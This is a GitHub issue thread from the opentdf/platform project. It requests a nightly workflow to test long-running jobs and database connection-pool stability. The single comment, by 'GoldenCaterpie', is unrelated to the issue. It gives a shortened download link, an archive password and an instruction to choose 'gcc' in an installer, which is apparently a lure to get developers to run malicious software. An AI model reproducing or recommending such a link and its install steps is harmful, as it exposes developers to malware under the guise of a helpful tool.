### ISSUE TITLE
Implement a nightly job to regularly test long jobs

### ISSUE THREAD

**Issue by jrschumacher** [opentdf/platform#1465]
With the recent discovery of #1442 it was determined that a nightly job was necessary to run long jobs to ensure regressions are not introduced.

## Acceptance Criteria

- implement a nightly workflow
- update CI to support `on: workflow_call` https://docs.github.com/en/actions/sharing-automations/reusing-workflows#creating-a-reusable-workflow
- call CI workflow
- add job to test db instability (test connection pool)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
